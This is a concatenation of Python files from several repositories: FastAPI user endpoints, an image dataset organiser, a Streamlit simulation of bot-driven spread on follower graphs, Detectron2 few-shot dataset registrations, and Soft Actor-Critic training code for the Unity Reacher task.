async def read_single_user(
*,
db: Session = Depends(get_session),
user_id: int,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
user = crud_base.get(db, id=user_id)
if not user:
utils.profiling_api("user:get:single:id", start_date, "error")
raise HTTPException(status_code=404, detail="User not found")
utils.profiling_api("user:get:single:id", start_date, "info")
return user
@router.get("/info/{email}", response_model=models.UserDataModel)
async def read_single_user_by_mail(
*,
db: Session = Depends(get_session),
email: str,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
user = crud.user.get_by_email(db, email=email)
if not user:
utils.profiling_api("user:get:single:email", start_date, "error")
raise HTTPException(status_code=404, detail="User not found")
utils.profiling_api("user:get:single:email", start_date, "info")
return user
@router.get("/info/{username}", response_model=models.UserDataModel)
async def read_single_user_by_username(
*,
db: Session = Depends(get_session),
username: str,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
user = crud.user.get_by_username(db, username=username)
if not user:
utils.profiling_api("user:get:single:username", start_date, "error")
raise HTTPException(status_code=404, detail="User not found")
utils.profiling_api("user:get:single:username", start_date, "info")
return user
@router.post("/", response_model=models.UserDataModel)
async def create_user(
*,
db: Session = Depends(get_session),
user_in: models.UserCreate,
current_user: models.UserBase = Depends(security.get_current_admin_user),
) -> Any:
start_date = dt.datetime.now()
try:
user = crud.user.create(db, obj_in=user_in)
utils.profiling_api("user:create", start_date, "info")
return user
except Exception as message:
utils.profiling_api("user:create", start_date, "error")
raise HTTPException(
status_code=404, detail=f"Impossible to add a new user: {message}"
)
@router.put("/update/me", response_model=models.UserDataModel)
async def update_user_me(
*,
db: Session = Depends(get_session),
user_in: models.UserUpdate,
current_user: models.UserBase = Depends(security.get_current_user),
) -> Any:
start_date = dt.datetime.now()
# current_user_data = jsonable_encoder(current_user)
# user_existing = models.UserUpdate(**current_user_data)
# user_data = user_in.dict(exclude_unset=True)
# for key, value in user_data.items():
# setattr(current_user_data, key, value)
try:
user = crud_base.update(db, db_obj=current_user, obj_in=user_in)
utils.profiling_api("user:update", start_date, "info")
if not user:
utils.profiling_api("user:update", start_date, "error")
raise HTTPException(
status_code=404,
detail="Impossible to update the user",
)
except Exception as message:
utils.profiling_api("user:update", start_date, "error")
raise HTTPException(
status_code=400,
detail=f"Impossible to update the user: {message}",
)
```
#### File: JeyDi/Python-Skeleton/__version__.py
```python
__version__ = "0.0.1"
from typing import Union
def format_unit(value: Union[float, int], unit: str) -> str:
"""[summary]
Args:
value (Union[float, int]): [description]
unit (str): [description]
Returns:
str: [description]
"""
return "{} {}".format(value, unit)
```
|
{
"source": "JeyDi/SeasonImageAnalyzer",
"score": 3
}
|
#### File: SeasonImageAnalyzer/downloader/dataset_organizer.py
```python
import os
import random
import shutil
import numpy as np
import cv2
from pathlib import Path
from tqdm import tqdm
from random import shuffle
from keras.preprocessing import image
from image_processing import processImage
main_keywords = ['summer','winter','autumn','spring']
main_dir_path = Path(__file__).resolve().parent.parent
split = 0.7
## 1 funzione:
#vai nella cartella corrispondente
#aggiungi il nome della label prima del numero: summer_id.jpg
#prendi la prima metà delle immagini (percentuale di split selezionabile)
#sposta la prima parte in: trainingset e ricalcola indici dopo la label: summer_newid.jpg
#sposta la seconda parte in: testset e ricalcola indici dopo la label: summer_newid.jpg
def clean_images(main_keywords,main_dir_path,split=0.7):
training_path = os.path.join(main_dir_path, "trainingset")
test_path = os.path.join(main_dir_path, "testset")
print("\ntraining_path: " + str(training_path))
print("\ntest_path: " + str(test_path))
for i, item in enumerate(main_keywords):
dir_path = os.path.join(main_dir_path,"download",item)
filenames = os.listdir(dir_path)
print("\ndir_path: " + str(dir_path))
print("Number of files in the folder: ",len(filenames))
if filenames :
for i, picture in enumerate(filenames):
#Check if the files already updated
if "_" not in picture:
filename_without_ext = os.path.splitext(picture)[0]
extension = os.path.splitext(picture)[1]
new_file_name = str(item) + "_" + filename_without_ext
new_file_name_with_ext = new_file_name + extension
#print(new_file_name_with_ext)
os.rename(os.path.join(dir_path,picture), os.path.join(dir_path,new_file_name_with_ext))
else:
continue
#Re-get the new list of filenames
filenames = os.listdir(dir_path)
#Split the file to create the trainingset and the test set
number_to_split = round(len(filenames) * (split*100) / 100)
print("Number to split in ", item, " : ", number_to_split)
#trainingset = range(0, len(main_keywords)-1, number_to_split)
#Per ogni elemento di number_to_split
#Genero un numero random da 0 a len(main_keywords)
#Prendo l'elemento con quell'indice e lo sposto nella cartella di training
#List of all files in the directory
for i in range(0, number_to_split-1):
filenames = os.listdir(dir_path)
element = random.randint(0, len(filenames)-1)
element_to_move = filenames[element]
training_item_folder = os.path.join(training_path,item)
training_file = os.path.join(training_path,item,element_to_move)
#If the subfolder doesn't exist, create
if not os.path.exists(training_item_folder):
os.makedirs(training_item_folder)
if os.path.isfile(training_file):
print("File: " + str(training_file) + " already exist in the training set..")
continue
else:
#Preprocess image and move
element_to_move_processed = processImage(os.path.join(dir_path,element_to_move))
if element_to_move_processed is not None:
shutil.move(element_to_move_processed, training_file)
#Reload list of files remaining in the dataset subfolder
remaining_filenames = os.listdir(dir_path)
print("remaining files for testset: ", len(remaining_filenames))
#Move this remaining file to the test set
for f in remaining_filenames:
test_item_folder = os.path.join(test_path,item)
test_file = os.path.join(test_path,item,f)
#If the subfolder doesn't exist, create
if not os.path.exists(test_item_folder):
os.makedirs(test_item_folder)
if os.path.isfile(test_file):
print("File: " + str(test_file) + " already exist in the test set..")
continue
else:
#Preprocess image and move
element_to_move_processed = processImage(os.path.join(dir_path,f))
if element_to_move_processed is not None:
shutil.move(element_to_move_processed, test_file)
print("Folder: ", item, " splitted")
else:
print("Folder is empty..")
return(True)
#<NAME>
## 2 funzione:
###RICALCOLO GLI INDICI PER TRAININGSET E TESTSET
def calculate_indexes(start_path,datasetname = "trainingset"):
dir_path = os.path.join(start_path,datasetname)
print("Calculate new indexes in: ", dir_path)
filenames = os.listdir(dir_path)
for i, item in enumerate(filenames):
class_name = item.split('_')[0]
extension = item.split('.')[1]
new_name = class_name + "_" + str(i) + "." + extension
old_image = os.path.join(dir_path,item)
new_image = os.path.join(dir_path,new_name)
os.rename(old_image, new_image)
print("Completed...")
return True
## 3 funzione:
#genera un numpy array caricando le immagini in rgb
#salva il numpy array per gli esperimenti
#Create a label for an image
def create_label(keywords,image):
for i, key in enumerate(keywords):
label = image.split('_')[0]
if key.lower() == label.lower():
ohl = np.array([i])
return(ohl)
#Create the dataset
def create_dataset(keywords,start_path,dataset_type="trainingset"):
dataset = []
dir_path = os.path.join(start_path, dataset_type)
for i in tqdm(os.listdir(dir_path)):
image_path = os.path.join(dir_path,i)
#print("ImagePath: ",image_path)
# Load image in color
img = image.load_img(image_path)
#Append the new image and label
dataset.append([np.array(img),create_label(keywords,i)])
dataset = np.array(dataset)
#Save the numpy array to disk
outfile = str(os.path.join(start_path,dataset_type)) + ".npy"
np.save(outfile, dataset)
print("Numpy array saved")
return dataset
```
|
{
"source": "JeyDi/STN",
"score": 4
}
|
#### File: streamlit_app/graph_builder/graph.py
```python
import networkx as nx
import pandas as pd
import os
from tqdm import tqdm
import time
GRAPH_PATH = "./data/graph"
def create_graph(df, follower_number, level2_path, graph_name, direct_graph=True):
"""Create Networkx Graph
It's possible to create direct or not direct graphs.
For now it's working only with 2 level of followers according to the project.
Args:
df (object): dataframe with all the followers (level 1) data
follower_number (int): limit level 1 followers
level2_path (string): path of the second level (level 2) data for the graph
graph_name (string): name of the output file (graph)
direct_graph (bool, optional): If you want to generate a direct graph. Defaults to True.
"""
# TODO: better error catching
G = None
if direct_graph == True:
G = nx.DiGraph()
elif direct_graph == False:
G = nx.Graph()
start_time = time.time()
G.add_node("MainNode")
print(f"Level 2 path: {level2_path}")
print(f"Graph name: {graph_name}")
# add the second level of nodes
index = 0
while len(G.edges("MainNode")) < follower_number:
try:
u = df["username"][index]
except KeyError:
print("Key Error in csv")
try:
if not G.has_node(u):
G.add_node(u)
G.add_edge("MainNode", u)
level2 = pd.read_csv(os.path.join(level2_path, u + "_followers.csv"))
for v in level2["username"]:
if not G.has_node(v):
G.add_node(v)
G.add_edge(u, v)
index += 1
except:
print(u + " Not downloaded")
index += 1
print(f'Main Node has {len(G.edges("MainNode"))} edges')
G_int = nx.convert_node_labels_to_integers(G)
graph_filename = os.path.join(GRAPH_PATH, graph_name + ".gexf")
nx.write_gexf(G_int, graph_filename)
print("--- %s seconds ---" % (time.time() - start_time))
print(f"Graph generated to: {graph_filename}")
node_numbers = G.number_of_nodes()
return node_numbers
```
#### File: STN/streamlit_app/menu.py
```python
import streamlit as st
from menus.side_menu import (
menu_scraper,
menu_graph_generator,
menu_bot_selection,
menu_soil_simulation_subroutine,
menu_plot_generations,
count_statistics,
)
def side_menu():
"""
Streamlit side config menu
"""
st.sidebar.markdown("**Configuration Panel**")
#### SCRAPER CONFIGURATION ####
menu_scraper()
#### GRAPH GENERATION ####
menu_graph_generator()
#### BOT SELECTION ####
menu_bot_selection()
#### SIMULATION WITH SOIL ####
# TODO: test diretti e indiretti
menu_soil_simulation_subroutine()
#### PLOT GENERATIONS ####
menu_plot_generations()
#### COUNT STATISTICS ####
count_statistics()
def launch():
"""
Main function to launch all the streamilit functionalities
"""
try:
# Launch the side menu for all the configurations
result = side_menu()
return True
except Exception as message:
print(f"Impossible to launch the streamlit functionalities: {message}")
return False
```
#### File: streamlit_app/statistics/visualizations.py
```python
import statistics.counters as cn
import networkx as nx
import pandas as pd
import plotly.express as px
from plotly.offline import plot
import streamlit as st
def print_stats(G, step, graph_name):
not_exposed = cn.count_not_exposed(G)
exposed = cn.count_exposed(G)
exposed_opinion_leader = cn.count_exposed_opinion_leader(G)
exposed_bot = cn.count_exposed_bot(G)
exposed_user = cn.count_exposed_user(G)
exposed_directed, exposed_undirected= cn.count_exposed_directed(G)
infected = cn.count_infected(G)
infected_opinion_leader = cn.count_infected_opinion_leader(G)
infected_bot = cn.count_infected_bot(G)
infected_user = cn.count_infected_user(G)
infected_directed, infected_undirected = cn.count_infected_directed(G)
# Print informations for debug purpose on terminal
print("---------------------------------------")
print(f"\nSTEP {step}:")
print(f"Not exposed: {not_exposed}")
print(f"Exposed: {exposed}")
print(
f"\tFrom Opinion Leader: {exposed_opinion_leader}, from BOT: {exposed_bot}, from users: {exposed_user}"
)
print(
f"\tDirected: {exposed_directed}, Undirected: {exposed_undirected}"
)
print(f"Infected: {infected}")
print(
f"\tFrom Opinion Leader: {infected_opinion_leader}, from BOT: {infected_bot}, from users: {infected_user}"
)
print(
f"\tDirected: {infected_directed}, Undirected: {infected_undirected}"
)
# Print on GUI
st.markdown("---------------")
st.markdown(f"**STEP: {step} results of: {graph_name}**")
st.markdown(f"Not exposed: {not_exposed}")
st.markdown(f"Exposed: {exposed}")
st.markdown(
f"\tFrom Opinion Leader: {exposed_opinion_leader}, from BOT: {exposed_bot}, from users: {exposed_user}"
)
st.markdown(
f"\tDirected: {exposed_directed}, Undirected: {exposed_undirected}"
)
st.markdown(f"Infected: {infected}")
st.markdown(
f"\tFrom Opinion Leader: {infected_opinion_leader}, from BOT: {infected_bot}, from users: {infected_user}"
)
st.markdown(
f"\tDirected: {infected_directed}, Undirected: {infected_undirected}"
)
def generate_statistics_plots(graph_name, graph_steps):
"""
Generate the final plots and call the statistics print function
Args:
graph_name (str): number of the result graph saved in the previos logical step
graph_steps (int): number of steps you want to execute (depend on the steps are inside the graph)
"""
df_final_situation = pd.DataFrame(columns=["type", "value"])
df_step = pd.DataFrame(columns=["type", "step", "value"])
df_exposed = pd.DataFrame(columns=["step", "type", "value"])
st.markdown("")
for i in range(graph_steps):
# read graph and print stats
graph_result_path = "./data/output/"
G = nx.read_gexf(f"{graph_result_path}G_{graph_name}_step{i}.gexf")
print_stats(G, i, graph_name)
# LINE CHART (append informations into dataframe)
df_step = df_step.append(
{"type": "not_exposed", "step": i, "value": cn.count_not_exposed(G)},
ignore_index=True,
)
df_step = df_step.append(
{"type": "exposed", "step": i, "value": cn.count_exposed(G)},
ignore_index=True,
)
df_step = df_step.append(
{"type": "infected", "step": i, "value": cn.count_infected(G)},
ignore_index=True,
)
line_chart = px.line(
df_step,
x="step",
y="value",
color="type",
title=f"Infection overall: {graph_name} step: {i}",
)
# BAR CHART (append informations into dataframe)
df_exposed = df_exposed.append(
{
"step": i,
"type": "opinion_leader",
"value": cn.count_exposed_opinion_leader(G),
},
ignore_index=True,
)
df_exposed = df_exposed.append(
{"step": i, "type": "bot", "value": cn.count_exposed_bot(G)},
ignore_index=True,
)
df_exposed = df_exposed.append(
{"step": i, "type": "user", "value": cn.count_exposed_user(G)},
ignore_index=True,
)
bar_chart = px.bar(
df_exposed,
x="step",
y="value",
color="type",
title=f"Type of agents exposed: {graph_name} step: {i}",
)
# PIE CHART (append informations into dataframe)
if i == 4:
df_final_situation = df_final_situation.append(
{"type": "not_exposed", "value": cn.count_not_exposed(G)},
ignore_index=True,
)
df_final_situation = df_final_situation.append(
{"type": "exposed", "value": cn.count_exposed(G)},
ignore_index=True,
)
df_final_situation = df_final_situation.append(
{"type": "infected", "value": cn.count_infected(G)},
ignore_index=True,
)
#### CREATE THE PLOTS
##Uncomment plot(..) to save the plots to disk in html format
plot_folder = "./data/plots/"
# Plotly Line Plot
# plot(line_chart, filename=f"{plot_folder}steps_{graph_name}.html")
st.plotly_chart(line_chart, use_container_width=True)
# Plotly bar plot
# plot(bar_chart, filename=f"{plot_folder}exposed_type_{graph_name}.html")
st.plotly_chart(bar_chart, use_container_width=True)
# Plotly final pie chart
final_pie_chart = px.pie(
df_final_situation, values="value", names="type", title=f"Final situation plot of: {graph_name}"
)
# plot(final_pie_chart, filename=f"{plot_folder}final_situation.html")
st.plotly_chart(final_pie_chart, use_container_width=True)
print("\nStatistics calculated succesfully")
return True
```
#### File: streamlit_app/visualize/build_plot.py
```python
import networkx as nx
import pandas as pd
import plotly.graph_objects as go
from plotly.offline import plot
import pickle
from visualize.layout import build_graph
import streamlit as st
def step_graph(G, df, step):
"""
Prende il grafo e per ogni step della simulazione prende i risultati della simulazione di quello step e aggiunge gli attributi ai nodi
"""
try:
print(f"Start editing the plot for the step: {step}")
df_id = df[df["key"] == "id"].reset_index()
df_infected_type = df[df["key"] == "infected_type"].reset_index()
df_directed = df[df['key'] == 'directed' ].reset_index()
df_type = df[df["key"] == "type"] # DF with opinion leader and bot
df_type["agent_id"] = df_type["agent_id"].astype("str")
df_type = df_type.set_index("agent_id")
nx.set_node_attributes(G, df_type["value"].to_dict(), "type")
i = 0
while i <= step:
step_df = df_id[df_id["t_step"] == i]
step_df["agent_id"] = step_df["agent_id"].astype("str")
step_df = step_df.set_index("agent_id")
nx.set_node_attributes(G, step_df["value"].to_dict(), "state")
step_infected_type = df_infected_type[df_infected_type["t_step"] == i]
step_infected_type["agent_id"] = step_infected_type["agent_id"].astype(
"str"
)
step_infected_type = step_infected_type.set_index("agent_id")
nx.set_node_attributes(
G, step_infected_type["value"].to_dict(), "infected_type"
)
step_directed = df_directed[df_directed['t_step'] == i]
step_directed['agent_id'] = step_directed['agent_id'].astype(
"str"
)
step_directed = step_directed.set_index('agent_id')
nx.set_node_attributes(
G, step_directed['value'].to_dict(), 'directed'
)
i = i + 1 # INTERVAL IN AGENT PARAMETER
result = G.copy()
print(f"Graph fixed for the step: {step}")
return result
except Exception as message:
print(f"Impossible to edit the graph: {message}")
return None
def generate_graph_plot(
G_path,
simulation_data_path,
simulation_name,
G_step_iterations=5,
sprint_layout_calc=False,
):
# Import data
try:
G = nx.read_gexf(G_path)
df = pd.read_csv(simulation_data_path)
print("data succesfully loaded")
except Exception as message:
print(f"Impossibile to read data: {message}")
try:
if is_simulation_based_on_500(simulation_name):
layout_pickle_filename = "./data/serialization/G_node_poss_layout.pkl"
# Shared layout
if sprint_layout_calc:
G_node_pos = nx.spring_layout(G)
with open(layout_pickle_filename, "wb") as output:
pickle.dump(G_node_pos, output, pickle.HIGHEST_PROTOCOL)
load = False
print("Spring graph layout calcolated and stored")
else:
##load pickle object
with open(layout_pickle_filename, "rb") as input:
G_node_pos = pickle.load(input)
load = True
print("Spring graph layout loaded from pickle file")
except Exception as message:
if load:
print(f"Impossibile to load the pickle file: {message}")
elif not load:
print(f"Impossible to calc and save the pickle file: {message}")
for i in range(G_step_iterations):
print(f"Start generating the plot: {G_step_iterations}")
G_step = None
G_step = step_graph(G, df, i)
nx.write_gexf(G_step, f"./data/output/G_{simulation_name}_step{i}.gexf")
if is_simulation_based_on_500(simulation_name):
result_graph = build_graph(G_step, G_node_pos, i)
st.plotly_chart(result_graph, use_container_width=True)
print(f"{simulation_name} - STEP {i} DONE")
print("\nGraph plot and statistics calculated succesfully")
return True
def is_simulation_based_on_500(simulation_name):
return simulation_name.split("_")[1] == "500"
```
|
{
"source": "JeyesHan/DeFRCN_Custom",
"score": 2
}
|
#### File: defrcn/data/builtin.py
```python
import os
from .meta_voc import register_meta_voc, load_filtered_voc_instances
from .meta_coco import register_meta_coco
from .builtin_meta import _get_builtin_metadata
from detectron2.data import DatasetCatalog, MetadataCatalog
# -------- COCO -------- #
def register_all_coco(root="datasets"):
METASPLITS = [
("coco14_trainval_all", "coco/trainval2014", "cocosplit/datasplit/trainvalno5k.json"),
("coco14_trainval_base", "coco/trainval2014", "cocosplit/datasplit/trainvalno5k.json"),
("coco14_test_all", "coco/val2014", "cocosplit/datasplit/5k.json"),
("coco14_test_base", "coco/val2014", "cocosplit/datasplit/5k.json"),
("coco14_test_novel", "coco/val2014", "cocosplit/datasplit/5k.json"),
]
for prefix in ["all", "novel"]:
for shot in [1, 2, 3, 5, 10, 30]:
for seed in range(10):
name = "coco14_trainval_{}_{}shot_seed{}".format(prefix, shot, seed)
METASPLITS.append((name, "coco/trainval2014", ""))
for name, imgdir, annofile in METASPLITS:
register_meta_coco(
name,
_get_builtin_metadata("coco_fewshot"),
os.path.join(root, imgdir),
os.path.join(root, annofile),
)
# -------- PASCAL VOC -------- #
def register_all_voc(root="datasets"):
METASPLITS = [
("voc_2007_trainval_base1", "VOC2007", "trainval", "base1", 1),
("voc_2007_trainval_base2", "VOC2007", "trainval", "base2", 2),
("voc_2007_trainval_base3", "VOC2007", "trainval", "base3", 3),
("voc_2012_trainval_base1", "VOC2012", "trainval", "base1", 1),
("voc_2012_trainval_base2", "VOC2012", "trainval", "base2", 2),
("voc_2012_trainval_base3", "VOC2012", "trainval", "base3", 3),
("voc_2007_trainval_all1", "VOC2007", "trainval", "base_novel_1", 1),
("voc_2007_trainval_all2", "VOC2007", "trainval", "base_novel_2", 2),
("voc_2007_trainval_all3", "VOC2007", "trainval", "base_novel_3", 3),
("voc_2012_trainval_all1", "VOC2012", "trainval", "base_novel_1", 1),
("voc_2012_trainval_all2", "VOC2012", "trainval", "base_novel_2", 2),
("voc_2012_trainval_all3", "VOC2012", "trainval", "base_novel_3", 3),
("voc_2007_test_base1", "VOC2007", "test", "base1", 1),
("voc_2007_test_base2", "VOC2007", "test", "base2", 2),
("voc_2007_test_base3", "VOC2007", "test", "base3", 3),
("voc_2007_test_novel1", "VOC2007", "test", "novel1", 1),
("voc_2007_test_novel2", "VOC2007", "test", "novel2", 2),
("voc_2007_test_novel3", "VOC2007", "test", "novel3", 3),
("voc_2007_test_all1", "VOC2007", "test", "base_novel_1", 1),
("voc_2007_test_all2", "VOC2007", "test", "base_novel_2", 2),
("voc_2007_test_all3", "VOC2007", "test", "base_novel_3", 3),
]
for prefix in ["all", "novel"]:
for sid in range(1, 4):
for shot in [1, 2, 3, 5, 10]:
for year in [2007, 2012]:
for seed in range(30):
seed = "_seed{}".format(seed)
name = "voc_{}_trainval_{}{}_{}shot{}".format(
year, prefix, sid, shot, seed
)
dirname = "VOC{}".format(year)
img_file = "{}_{}shot_split_{}_trainval".format(
prefix, shot, sid
)
keepclasses = (
"base_novel_{}".format(sid)
if prefix == "all"
else "novel{}".format(sid)
)
METASPLITS.append(
(name, dirname, img_file, keepclasses, sid)
)
for name, dirname, split, keepclasses, sid in METASPLITS:
year = 2007 if "2007" in name else 2012
register_meta_voc(
name,
_get_builtin_metadata("voc_fewshot"),
os.path.join(root, dirname),
split,
year,
keepclasses,
sid,
)
MetadataCatalog.get(name).evaluator_type = "pascal_voc"
register_all_coco()
register_all_voc()
# register custom dataset
def register_custom(name, dirname, split, year, thing_classes):
DatasetCatalog.register(
name,
lambda: load_filtered_voc_instances(
name, dirname, split, thing_classes
),
)
MetadataCatalog.get(name).set(
thing_classes=thing_classes,
dirname=dirname,
year=year,
split=split,
evaluator_type = "pascal_voc",
base_classes=thing_classes,
novel_classes=[],
)
# register_custom("robot_competition_voc_trainval", "/home/hanj/pyprojects/robot_competition", "trainval", 2007, ['purple bottle', 'biscuit', 'apple'])
# register_custom("robot_competition_voc_test", "/home/hanj/pyprojects/robot_competition", "test", 2007, ['purple bottle', 'biscuit', 'apple'])
register_custom("robot_competition_voc_trainval", "/home/hanj/pyprojects/robot_initial/stepx", "trainval", 2007, ['purple bottle', 'biscuit', 'apple'])
register_custom("robot_competition_voc_test", "/home/hanj/pyprojects/robot_test", "test", 2007, ['purple bottle', 'biscuit', 'apple'])
```
|
{
"source": "Jeyhooon/deep-reinforcement-learning",
"score": 2
}
|
#### File: p2_continuous_control/sac_agent/main.py
```python
import argparse
import numpy as np
import torch
from torch import optim
import pathlib
import os
import matplotlib.pyplot as plt
from datetime import date
from unityagents import UnityEnvironment
from scripts.agent import SACAgent
from scripts import utils
os.chdir(pathlib.Path(__file__).parent.absolute())
RESULTS_DIR = os.path.join('results')
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
config = {
"ROOT_DIR": "results", # directory to save the results
"BUFFER_SIZE": int(1e6), # replay buffer size
"BATCH_SIZE": 256, # mini-batch size
"WARMUP_BATCHES": 10, # number of initial batches to fill the buffer with
"TAU": 5e-3, # for soft update of target parameters
"UPDATE_EVERY": 1, # how often to update the network
"SEED": [1], # list of the seed to do randomize each training
"Q_NET_Hidden_Dims": (128, 128), # Size of the hidden layer in Q-Net
"Q_LR": 7e-4, # Q-Net learning rate
"Q_MAX_GRAD_NORM": float('inf'), # to clip gradients of Q-Net
"POLICY_NET_Hidden_Dims": (64, 64), # Size of the hidden layer in Policy-Net
"POLICY_LR": 5e-4, # Policy-Net learning rate
"POLICY_MAX_GRAD_NORM": float('inf'), # to clip gradients of the Policy-Net
"ENV_SETTINGS": {
'ENV_NAME': 'Reacher_Linux/Reacher.x86_64',
'GAMMA': 0.99,
'MAX_MINUTES': 300,
'MAX_EPISODES': 10000,
'GOAL_MEAN_100_REWARD': 30
}
}
def create_agent(config):
policy_model_fn = lambda nS, bounds: utils.GaussianPolicyNet(nS, bounds, hidden_dims=config["POLICY_NET_Hidden_Dims"])
policy_optimizer_fn = lambda net, lr: optim.Adam(net.parameters(), lr=lr)
value_model_fn = lambda nS, nA: utils.QNet(nS, nA, hidden_dims=config["Q_NET_Hidden_Dims"])
value_optimizer_fn = lambda net, lr: optim.Adam(net.parameters(), lr=lr)
replay_buffer_fn = lambda: utils.ReplayBuffer(buffer_size=config["BUFFER_SIZE"], batch_size=config["BATCH_SIZE"])
return SACAgent(replay_buffer_fn,
policy_model_fn,
policy_optimizer_fn,
value_model_fn,
value_optimizer_fn,
config)
def process_results(results, root_dir: str):
'''
Extracts Relevent information, Plots and Saves the Results
'''
max_total_steps, max_episode_reward, max_100_reward, max_100_score, \
max_train_time, max_wall_time = np.max(results, axis=0).T
min_total_steps, min_episode_reward, min_100_reward, min_100_score, \
min_train_time, min_wall_time = np.min(results, axis=0).T
mean_total_steps, mean_episode_reward, mean_100_reward, mean_100_score, \
mean_train_time, mean_wall_time = np.mean(results, axis=0).T
x = np.arange(len(mean_100_score))
stats_dict = {
'x': x,
'max_100_reward': max_100_reward,
'min_100_reward': min_100_reward,
'mean_100_reward': mean_100_reward,
'max_100_score': max_100_score,
'min_100_score': min_100_score,
'mean_100_score': mean_100_score,
'max_total_steps': max_total_steps,
'min_total_steps': min_total_steps,
'mean_total_steps': mean_total_steps,
'max_train_time': max_train_time,
'min_train_time': min_train_time,
'mean_train_time': mean_train_time,
'max_wall_time': max_wall_time,
'min_wall_time': min_wall_time,
'mean_wall_time': mean_wall_time
}
data_path = os.path.join(root_dir, 'stats_dict.pth')
torch.save(stats_dict, data_path)
print(f"Processed Data Saved to: {data_path}")
# Plot the Learning Curve
fig, axs = plt.subplots(2, 1, figsize=(15, 10), sharey=False, sharex=True)
axs[0].plot(max_100_reward, 'g', linewidth=1)
axs[0].plot(min_100_reward, 'g', linewidth=1)
axs[0].plot(mean_100_reward, 'g:', label='SAC', linewidth=2)
axs[0].fill_between(
x, min_100_reward, max_100_reward, facecolor='g', alpha=0.3)
axs[1].plot(max_episode_reward, 'g', linewidth=1)
axs[1].plot(min_episode_reward, 'g', linewidth=1)
axs[1].plot(mean_episode_reward, 'g:', label='SAC', linewidth=2)
axs[1].fill_between(
x, min_episode_reward, max_episode_reward, facecolor='g', alpha=0.3)
axs[0].set_title('Moving Avg. Last_100_Episode_Reward (Training)')
axs[1].set_title('Mean Episode Rewards (Training)')
plt.xlabel('Episodes')
axs[0].legend(loc='upper left')
lc_path = os.path.join(root_dir, 'learning_curve.png')
plt.savefig(lc_path)
print(f"Learning-Curve Saved to: {lc_path}")
plt.show()
# Plot training time stats
fig, axs = plt.subplots(3, 1, figsize=(15, 15), sharey=False, sharex=True)
axs[0].plot(max_total_steps, 'g', linewidth=1)
axs[0].plot(min_total_steps, 'g', linewidth=1)
axs[0].plot(mean_total_steps, 'g:', label='SAC', linewidth=2)
axs[0].fill_between(x, min_total_steps, max_total_steps, facecolor='g', alpha=0.3)
axs[1].plot(max_train_time, 'g', linewidth=1)
axs[1].plot(min_train_time, 'g', linewidth=1)
axs[1].plot(mean_train_time, 'g:', label='SAC', linewidth=2)
axs[1].fill_between(x, min_train_time, max_train_time, facecolor='g', alpha=0.3)
axs[2].plot(max_wall_time, 'g', linewidth=1)
axs[2].plot(min_wall_time, 'g', linewidth=1)
axs[2].plot(mean_wall_time, 'g:', label='SAC', linewidth=2)
axs[2].fill_between(x, min_wall_time, max_wall_time, facecolor='g', alpha=0.3)
axs[0].set_title('Total Steps')
axs[1].set_title('Training Time')
axs[2].set_title('Wall-clock Time')
plt.xlabel('Episodes')
axs[0].legend(loc='upper left')
tc_path = os.path.join(root_dir, 'training_time_stats.png')
plt.savefig(tc_path)
print(f"Training-Time-Stats Saved to: {tc_path}")
plt.show()
def train(env):
# Creating the required directories
current_date = str(date.today()).replace('-', '_')
current_time = utils.get_date_time_now()
config["ROOT_DIR"] = os.path.join(config["ROOT_DIR"], current_date, current_time)
os.makedirs(config["ROOT_DIR"], exist_ok=True)
exp_results = []
best_agent, best_eval_score = None, float('-inf')
for seed in config["SEED"]:
_, gamma, max_minutes, max_episodes, goal_mean_100_reward = config["ENV_SETTINGS"].values()
agent = create_agent(config)
result, final_eval_score, training_time, wallclock_time = agent.train(env,
seed,
gamma,
max_minutes,
max_episodes,
goal_mean_100_reward)
exp_results.append(result)
if final_eval_score > best_eval_score:
best_eval_score = final_eval_score
best_agent = agent
process_results(exp_results, config["ROOT_DIR"])
return best_agent
if __name__ == "__main__":
# Parsing the arguments
parser = argparse.ArgumentParser()
parser.add_argument('--is_training', type=bool, default=True, help='Train otherwise Test/Eval')
parser.add_argument('--load_dir', type=str, default=None, help='Directory to load the model from')
args = parser.parse_args()
env_name, gamma, max_minutes, max_episodes, goal_mean_100_reward = config["ENV_SETTINGS"].values()
env = UnityEnvironment(file_name=env_name, seed=config["SEED"][0])
brain_name = env.brain_names[0]
brain = env.brains[brain_name]
env_info = env.reset(train_mode=False)[brain_name] # reset the environment
# number of agents in the environment
print('Number of Agents:', len(env_info.agents))
# number of actions
action_size = brain.vector_action_space_size
print('Action Size:', action_size)
# examine the state space
state = env_info.vector_observations[0]
print('States look like:', state)
state_size = len(state)
print('State Size:', state_size)
# watch an untrained agent
agent = create_agent(config)
env_info = env.reset(train_mode=False)[brain_name]
action_bounds = [-1 for _ in range(action_size)], [1 for _ in range(action_size)]
agent.setup(state_size, action_size, action_bounds)
state = env_info.vector_observations[0]
score = 0 # initialize the score
for _ in range(50):
action = agent.policy_model.select_action(state) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.vector_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("UnTrained Agent's Score: {}".format(score))
if args.is_training:
agent = train(env)
args.load_dir = config["ROOT_DIR"]
# load the weights from the file
assert args.load_dir is not None
trained_policy = utils.load_checkpoint(model=agent.policy_model, path=args.load_dir)
# watch the trained agent
score = 0 # initialize the score
env_info = env.reset(train_mode=False)[brain_name]
state = env_info.vector_observations[0]
while True:
action = trained_policy.select_action(state) # select an action
env_info = env.step(action)[brain_name] # send the action to the environment
next_state = env_info.vector_observations[0] # get the next state
reward = env_info.rewards[0] # get the reward
done = env_info.local_done[0] # see if episode has finished
score += reward # update the score
state = next_state # roll over the state to next time step
if done: # exit loop if episode finished
break
print("Trained Agent's Score: {}".format(score))
print("Experiment Finished! ... Closing the Environment ...")
env.close()
```
|
{
"source": "Jeyhooon/gdrl",
"score": 2
}
|
#### File: gdrl/scripts/agent_reinforce.py
```python
import torch
import numpy as np
import time
import tempfile
import random
from itertools import count
import gc
import os
import glob
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import utils
default_variables_dict = utils.get_default_variable_dict()
LEAVE_PRINT_EVERY_N_SECS = default_variables_dict["LEAVE_PRINT_EVERY_N_SECS"]
